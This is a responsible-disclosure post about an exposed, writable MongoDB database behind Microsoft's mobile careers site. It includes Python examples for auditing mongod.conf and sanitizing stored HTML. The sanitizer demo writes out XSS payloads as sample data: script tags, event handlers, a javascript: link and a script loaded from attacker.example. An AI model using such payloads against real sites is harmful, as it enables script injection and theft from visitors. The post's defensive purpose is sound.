Microsoft Careers Site Was Vulnerable to Attack
An exposed database was serving potentially arbitrary HTML through the mobile version of Microsoft’s careers page (m.careersatmicrosoft.com).
Punchkick Interactive is a mobile web development company. Microsoft relies on Punchkick to handle the database that powers m.careersatmicrosoft.com. The bad news is that, for at least the past few weeks, this backend database has been exposed to the open internet and required no authentication at all to access.
The good news is that as of February 5th, following my disclosure of the vulnerability to Punchkick and Microsoft, everything has been secured. For those curious, there is an overview screenshot of the database in its exposed form included with this post. You’ll notice some other company names in the image, but I focused on Microsoft due to the probability of that portion having the most impact.
All indications are that the database, a MongoDB instance, was not write-protected. You probably see where this is going. During the exposed timeframe, an attacker could have modified the database, and thus the HTML code of job listing pages being served through m.careersatmicrosoft.com.
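The exposure described above, an instance reachable from the internet with no authentication required, comes down to two mongod.conf settings: whether authorization is enabled and which interfaces the server listens on. The following Python script is an added example, not code from the original post, Punchkick or Microsoft. It audits two constructed mongod.conf fragments, a weak one beside a corrected one (paths and values are assumptions, not Punchkick's real configuration), for exactly those settings. Treating an absent bindIp as "all interfaces" is an assumption that matches the upstream mongod default at the time of this post; the function names are mine.

```python
"""Audit mongod.conf for the two settings behind an openly exposed instance."""

# Constructed weak configuration: no authorization, listening on every interface.
WEAK_CONF = """\
net:
  port: 27017
  bindIp: 0.0.0.0
storage:
  dbPath: /var/lib/mongodb
"""

# Constructed hardened configuration: credentials required, loopback only.
HARDENED_CONF = """\
net:
  port: 27017
  bindIp: 127.0.0.1
security:
  authorization: enabled
storage:
  dbPath: /var/lib/mongodb
"""


def parse_two_level(conf_text):
    """Read the `section:` / `  key: value` YAML subset used by mongod.conf.

    Returns a dict keyed by dotted path, e.g. {"net.bindIp": "0.0.0.0"}.
    Deeper nesting and lists are out of scope for this illustration.
    """
    settings, section = {}, None
    for raw in conf_text.splitlines():
        stripped = raw.strip()
        if not stripped or stripped.startswith("#"):
            continue
        key, _, value = stripped.partition(":")
        key, value = key.strip(), value.strip()
        if not raw[0].isspace():          # top-level section name
            section = key
            if value:
                settings[key] = value
        elif section is not None:         # indented key under the current section
            settings[f"{section}.{key}"] = value
    return settings


def audit_mongod_conf(conf_text):
    """Return findings for the settings that make an instance open to anyone."""
    cfg = parse_two_level(conf_text)
    findings = []
    # Without authorization, every client that can connect can read and write.
    if cfg.get("security.authorization", "disabled") != "enabled":
        findings.append("security.authorization is not 'enabled': no credentials required")
    # Assumption: when bindIp is absent, treat it as all interfaces, which was the
    # upstream mongod default at the time of this post.
    bind_ip = cfg.get("net.bindIp", "0.0.0.0")
    addresses = {a.strip() for a in bind_ip.split(",")}
    if addresses & {"0.0.0.0", "::"} or cfg.get("net.bindIpAll", "false").lower() == "true":
        findings.append(f"net.bindIp={bind_ip}: reachable from every interface")
    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_mongod_conf(text) or ["no findings"])
```

The parser is deliberately minimal; on a real deployment feed it the server's actual mongod.conf and run it from configuration management so the check happens before the service is exposed, not weeks after.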
The ability to inject arbitrary HTML into an official Microsoft careers webpage is, to say the least, a powerful find for a would-be malicious hacker. This situation is the classic definition of a potential watering hole attack.
In that scenario, any number of browser exploits could be launched against unsuspecting job-seekers. It would also be a fantastic phishing opportunity, as people seeking jobs at Microsoft probably tend to have higher value credentials.
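Because the web tier has no way of knowing whether a job-listing document was written by Punchkick or by an intruder with write access, database content has to be rendered as untrusted input. The following Python example is added here and is not code from the original post or from either company: it contrasts a renderer that concatenates listing documents straight into the page with one that escapes the title and passes the body through a small tag allowlist. The field names and sample listings are constructed assumptions, not the real schema.

```python
import html
from html.parser import HTMLParser

# Constructed sample documents standing in for the job-listings collection.
# The field names ("title", "body") are assumptions, not the real schema.
SAMPLE_LISTINGS = [
    {"title": "Software Engineer",
     "body": "<p>Build <b>great</b> things.</p>"},
    # A tampered document: anyone with write access to the database could store
    # script tags and event handlers that a trusting renderer emits verbatim.
    {"title": "Program Manager <script>alert(1)</script>",
     "body": '<p onclick="steal()">Apply <a href="javascript:evil()">here</a></p>'
             '<script src="//attacker.example/x.js"></script>'},
]


def render_trusting(doc):
    """Vulnerable: the document is assumed clean and concatenated into the page."""
    return f"<h1>{doc['title']}</h1>\n{doc['body']}"


# Markup a job listing legitimately needs; everything else is dropped.
# Attributes are discarded wholesale, so links would need a separate URL
# scheme check before being allowed back in.
ALLOWED_TAGS = {"p", "b", "i", "ul", "ol", "li", "br"}
DROP_CONTENT_TAGS = {"script", "style"}


class AllowlistSanitizer(HTMLParser):
    """Rebuilds a fragment keeping only allowlisted tags and escaped text."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.parts = []
        self._skipping = 0  # >0 while inside <script>/<style>, whose text is dropped

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT_TAGS:
            self._skipping += 1
        elif tag in ALLOWED_TAGS and not self._skipping:
            self.parts.append(f"<{tag}>")

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT_TAGS:
            self._skipping = max(0, self._skipping - 1)
        elif tag in ALLOWED_TAGS and tag != "br" and not self._skipping:
            self.parts.append(f"</{tag}>")

    def handle_data(self, data):
        # Text nodes are re-escaped, so stored entities cannot smuggle markup.
        if not self._skipping:
            self.parts.append(html.escape(data, quote=True))

    def result(self):
        return "".join(self.parts)


def sanitize_fragment(fragment):
    parser = AllowlistSanitizer()
    parser.feed(fragment)
    parser.close()
    return parser.result()


def render_hardened(doc):
    """Escapes the plain-text title and allowlists the HTML body."""
    return f"<h1>{html.escape(doc['title'])}</h1>\n{sanitize_fragment(doc['body'])}"


if __name__ == "__main__":
    for doc in SAMPLE_LISTINGS:
        print("--- trusting ---\n" + render_trusting(doc))
        print("--- hardened ---\n" + render_hardened(doc))
```

Output encoding at the rendering layer is a second line of defence, not a substitute for locking down the database; it limits what a tampered document can do, but an intruder who can write to the collection can still alter the text of every listing.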
Speaking of credentials, some of those were part of this exposed Punchkick database. As proof of the severity of the situation, one of my early emails to Microsoft regarding the vulnerability included a screenshot showing the name, email address, password hash, and issued tokens for Microsoft’s Global Employment Brand Marketing Manager, Karrie Shepro. A redacted version of the screenshot is posted along with this article.
My main point of contact at Punchkick Interactive was Charles Portwood. The most recent message I received from him contained, in part, the following:
The Mongo database is ours, but is used for a separate service that is ultimately consumed by the m.careersatmicrosoft.com website. This issue which caused the MongoDB to be exposed publicly has been fixed on our end.
Thanks for reporting this to us so that we could quickly correct it.
Charles R. Portwood II | Punchkick Interactive
He is right about Punchkick “quickly” correcting it. I believe there was only one hour between my first email to firstname.lastname@example.org and the database being secured. Punchkick gets points in my book for the quick turnaround, strong password hashing, and generally being very nice. This was an example of excellent incident response.
The lesson to learn here is that if you’re a big name player like Microsoft, it’s acceptable for third parties to handle mundane operations like job posting webpages. But be aware that a hole in the third party’s security can quickly become a hole in your security.
Attention - Portions of this article may be used for publication if properly referenced and credit is given to Kromtech Security Center.
Do you have security tips or suggestions? Contact: email@example.com